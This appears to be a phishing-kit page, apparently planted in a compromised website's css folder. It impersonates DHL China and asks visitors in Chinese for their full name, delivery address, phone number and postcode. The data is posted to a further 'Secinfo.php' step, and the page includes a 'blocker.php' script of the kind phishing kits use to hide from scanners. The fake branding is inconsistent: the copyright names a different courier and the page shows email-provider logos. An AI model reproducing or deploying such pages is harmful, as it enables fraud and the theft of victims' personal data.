File: /home/asjudine/public_html/css/DHLCN/deliveryform.php
<?php
include('blocker.php');
?>
<html>
<head>
<title>DHL | 快递</title>
<link rel="shortcut icon" href="http://www.dhl.com/img/favicon.gif" type="image/gif"/>
</head>
<script>
function validateForm()
{
var w=document.forms["myform"]["fullname"].value;
if(w==null || w=="")
{
alert("You must fill in your name");
return false;
}
var x=document.forms["myform"]["address"].value;
if(x==null || x=="")
{
alert("You must fill in your delivery address");
return false;
}
var y=document.forms["myform"]["phonenumber"].value;
if(y.length < 10)
{
alert("Mobile Number is not complete");
return false;
}
var z=document.forms["myform"]["postcode"].value;
if(z.length < 3)
{
alert("Incorrect Post Code");
return false;
}
}
</script>
<body background="images/5_1_dhl_global_locator_all_340_187.gif" text="black" link="blue" alink="blue" vlink="blue" background="" >
<img src="images/DHL_China_logo.JPG" width="180" height="70"><br><br>
<b style="color:#AD0808;font-size:20px;font-weight:bold">你的包送货地址</b><font face="verdana,arial" size=-1><p>
</p>
<form action="Secinfo.php" onsubmit="return validateForm()" method="post" name="myform">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="47%" height="87">
<tr>
<td align="center" width="24%" height="30" colspan="2">标注星号的字段是强制性的</td>
</tr>
<tr>
<td align="right" width="27%" height="8"><b>全名 :</b></td>
<td width="73%" height="8"> * <input type="text" name="fullname" size="25"> <small>例: Amy Lui</small></td>
</tr>
<tr>
<td align="right" width="27%" height="27"><b>送货地址 :</b></td>
<td width="73%" height="27"> * <input type="text" name="address" size="50"></td>
</tr>
<tr>
<td align="right" width="27%" height="36"><b>电话号码 :</b></td>
<td width="73%" height="36"> * <input type="text" name="phonenumber" size="20"> <small>例: +86-13924404378</small></td>
</tr>
<tr>
<td align="right" width="27%" height="31"><b>邮编 :</b></td>
<td width="73%" height="31"> * <input type="text" name="postcode" size="8"></td>
</tr>
<tr>
<td align="right" width="27%" height="42"> </td>
<td width="73%" height="42"> <input type="submit" value="确认地址"></td>
</tr>
</table>
</form>
<center><hr color="#AD0808" size=2 width="100%"> </center>
</font>
DHL 伙伴: <br>
<p> <img alt="Sina" src="images/sina.png" height="50" width="120"><img alt="QQ" src="images/qq.png" height="50" width="120"> <img src="images/tom.gif" alt="Tom" height="50" width="120"> <img src="images/aliyun.jpg" alt="Aliyun" width=120 height=50><img src="images/sohu.jpg" alt="Sohu" title="" width=120 height=50> <img src="images/21cn.png" alt="21cn" width=120 height=50>
<img src="images/netease_png.png" alt="Netease" title="" border=0 width="120" height="50"><img src="images/qiye.gif" alt="QIYE" title="" border=0 width="120" height="50"></p>
<br><p><center>版权 © 2016 顺丰快递.
版权所有.</center></p>
</body>
</html>